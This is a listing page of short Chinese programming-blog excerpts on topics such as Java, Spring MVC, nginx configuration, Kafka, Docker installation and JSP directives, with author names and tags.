  • 电驴链接在线视频播放源码 dubinwei 源码电驴播放器视频ed2k
    本项目是个搜索电驴(ed2k)链接的应用,借助于磁力视频播放器(官网: http://loveandroid.duapp.com/ 开放平台),可以实现在线播放视频,也可以用迅雷或者其他下载工具下载。 项目源码: http://git.oschina.net/svo/Emule,动态更新。也可从附件中下载。 项目源码依赖于两个库项目,库项目一链接: http://git.oschina.
  • Javascript中函数的toString()方法 周凡杨 JavaScriptjstoStringfunctionobject
    简述     The toString() method returns a string representing the source code of the function.     简译之,Javascript的toString()方法返回一个代表函数源代码的字符串。 句法     function.
  • struts处理自定义异常 g21121 struts
    很多时候我们会用到自定义异常来表示特定的错误情况,自定义异常比较简单,只要分清是运行时异常还是非运行时异常即可,运行时异常不需要捕获,继承自RuntimeException,是由容器自己抛出,例如空指针异常。 非运行时异常继承自Exception,在抛出后需要捕获,例如文件未找到异常。 此处我们用的是非运行时异常,首先定义一个异常LoginException: /** * 类描述:登录相
  • Linux中find常见用法示例 510888780 linux
    Linux中find常见用法示例 ·find   path   -option   [   -print ]   [ -exec   -ok   command ]   {} \; find命令的参数;
  • SpringMVC的各种参数绑定方式 Harry642 springMVC绑定表单
    1. 基本数据类型(以int为例,其他类似): Controller代码: @RequestMapping("saysth.do") public void test(int count) { } 表单代码: <form action="saysth.do" method="post&q
  • Java 获取Oracle ROWID aijuans javaoracle
    A ROWID is an identification tag unique for each row of an Oracle Database table. The ROWID can be thought of as a virtual column, containing the ID for each row. The oracle.sql.ROWID class i
  • java获取方法的参数名 antlove javajdkparametermethodreflect
    reflect.ClassInformationUtil.java package reflect; import javassist.ClassPool; import javassist.CtClass; import javassist.CtMethod; import javassist.Modifier; import javassist.bytecode.CodeAtt
  • JAVA正则表达式匹配 查找 替换 提取操作 百合不是茶 java正则表达式替换提取查找
    正则表达式的查找;主要是用到String类中的split();       String str;      str.split();方法中传入按照什么规则截取,返回一个String数组   常见的截取规则: str.split("\\.")按照.来截取 str.
  • Java中equals()与hashCode()方法详解 bijian1013 javasetequals()hashCode()
    一.equals()方法详解     equals()方法在object类中定义如下:  public boolean equals(Object obj) { return (this == obj); }    很明显是对两个对象的地址值进行的比较(即比较引用是否相同)。但是我们知道,String 、Math、I
  • 精通Oracle10编程SQL(4)使用SQL语句 bijian1013 oracle数据库plsql
    --工资级别表 create table SALGRADE ( GRADE NUMBER(10), LOSAL NUMBER(10,2), HISAL NUMBER(10,2) ) insert into SALGRADE values(1,0,100); insert into SALGRADE values(2,100,200); inser
  • 【Nginx二】Nginx作为静态文件HTTP服务器 bit1129 HTTP服务器
     Nginx作为静态文件HTTP服务器 在本地系统中创建/data/www目录,存放html文件(包括index.html) 创建/data/images目录,存放imags图片 在主配置文件中添加http指令   http { server { listen 80; server_name
  • kafka获得最新partition offset blackproof kafkapartitionoffset最新
    kafka获得partition下标,需要用到kafka的simpleconsumer   import java.util.ArrayList; import java.util.Collections; import java.util.Date; import java.util.HashMap; import java.util.List; import java.
  • centos 7安装docker两种方式 ronin47
          第一种是采用yum 方式              yum install -y docker           
  • java-60-在O(1)时间删除链表结点 bylijinnan java
    public class DeleteNode_O1_Time { /** * Q 60 在O(1)时间删除链表结点 * 给定链表的头指针和一个结点指针(!!),在O(1)时间删除该结点 * * Assume the list is: * head->...->nodeToDelete->mNode->nNode->..
  • nginx利用proxy_cache来缓存文件 cfyme cache
    user  zhangy users; worker_processes 10; error_log  /var/vlogs/nginx_error.log  crit; pid        /var/vlogs/nginx.pid; #Specifies the value for ma
  • [JWFD开源工作流]JWFD嵌入式语法分析器负号的使用问题 comsci 嵌入式
        假如我们需要用JWFD的语法分析模块定义一个带负号的方程式,直接在方程式之前添加负号是不正确的,而必须这样做:     string str01 = "a=3.14;b=2.71;c=0;c-((a*a)+(b*b))"     定义一个0整数c,然后用这个整数c去
  • 如何集成支付宝官方文档 dai_lm android
    官方文档下载地址 https://b.alipay.com/order/productDetail.htm?productId=2012120700377310&tabId=4#ps-tabinfo-hash 集成的必要条件 1. 需要有自己的Server接收支付宝的消息 2. 需要先制作app,然后提交支付宝审核,通过后才能集成 调试的时候估计会真的扣款,请注意
  • 应该在什么时候使用Hadoop datamachine hadoop
    原帖地址:http://blog.chinaunix.net/uid-301743-id-3925358.html 存档,某些观点与我不谋而合,过度技术化不可取,且hadoop并非万能。 --------------------------------------------万能的分割线-------------------------------- 有人问我,“你在大数据和Hado
  • 在GridView中对于有外键的字段使用关联模型进行搜索和排序 dcj3sjt126com yii
    在GridView中使用关联模型进行搜索和排序 首先我们有两个模型它们直接有关联: class Author extends CActiveRecord { ... } class Post extends CActiveRecord { ... function relations() { return array( '
  • 使用NSString 的格式化大全 dcj3sjt126com Objective-C
    格式定义The format specifiers supported by the NSString formatting methods and CFString formatting functions follow the IEEE printf specification; the specifiers are summarized in Table 1. Note that you c
  • 使用activeX插件对象object滚动有重影 蕃薯耀 activeX插件滚动有重影
      使用activeX插件对象object滚动有重影   <object style="width:0;" id="abc" classid="CLSID:D3E3970F-2927-9680-BBB4-5D0889909DF6" codebase="activex/OAX339.CAB#
  • SpringMVC4零配置 hanqunfeng springmvc4
    基于Servlet3.0规范和SpringMVC4注解式配置方式,实现零xml配置,弄了个小demo,供交流讨论。     项目说明如下: 1.db.sql是项目中用到的表,数据库使用的是oracle11g 2.该项目使用mvn进行管理,私服为自搭建nexus,项目只用到一个第三方 jar,就是oracle的驱动; 3.默认项目为零配置启动,如果需要更改启动方式,请
  • 《开源框架那点事儿16》:缓存相关代码的演变 j2eetop 开源框架
    问题引入 上次我参与某个大型项目的优化工作,由于系统要求有比较高的TPS,因此就免不了要使用缓冲。 该项目中用的缓冲比较多,有MemCache,有Redis,有的还需要提供二级缓冲,也就是说应用服务器这层也可以设置一些缓冲。 当然去看相关实现代代码的时候,大致是下面的样子。 [java] view plain copy print ? public vo
  • AngularJS浅析 kvhur JavaScript
    概念 AngularJS is a structural framework for dynamic web apps. 了解更多详情请见原文链接:http://www.gbtags.com/gb/share/5726.htm Directive 扩展html,给html添加声明语句,以便实现自己的需求。对于页面中html元素以ng为前缀的属性名称,ng是angular的命名空间
  • 架构师之jdk的bug排查(一)---------------split的点号陷阱 nannan408 split
    1.前言.    jdk1.6的lang包的split方法是有bug的,它不能有效识别A.b.c这种类型,导致截取长度始终是0.而对于其他字符,则无此问题.不知道官方有没有修复这个bug. 2.代码 String[] paths = "object.object2.prop11".split("'"); System.ou
  • 如何对10亿数据量级的mongoDB作高效的全表扫描 quentinXXZ mongodb
      本文链接:  http://quentinXXZ.iteye.com/blog/2149440 一、正常情况下,不应该有这种需求 首先,大家应该有个概念,标题中的这个问题,在大多情况下是一个伪命题,不应该被提出来。要知道,对于一般较大数据量的数据库,全表查询,这种操作一般情况下是不应该出现的,在做正常查询的时候,如果是范围查询,你至少应该要加上limit。 说一下,
  • C语言算法之水仙花数 qiufeihu c算法
    /** * 水仙花数 */ #include <stdio.h> #define N 10 int main() { int x,y,z; for(x=1;x<=N;x++) for(y=0;y<=N;y++) for(z=0;z<=N;z++) if(x*100+y*10+z == x*x*x
  • JSP指令 wyzuomumu jsp
    jsp指令的一般语法格式: <%@ 指令名 属性 =”值 ” %> 常用的三种指令: page,include,taglib page指令语法形式: <%@ page 属性 1=”值 1” 属性 2=”值 2”%> include指令语法形式: <%@include file=”relative url”%> (jsp可以通过 include
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他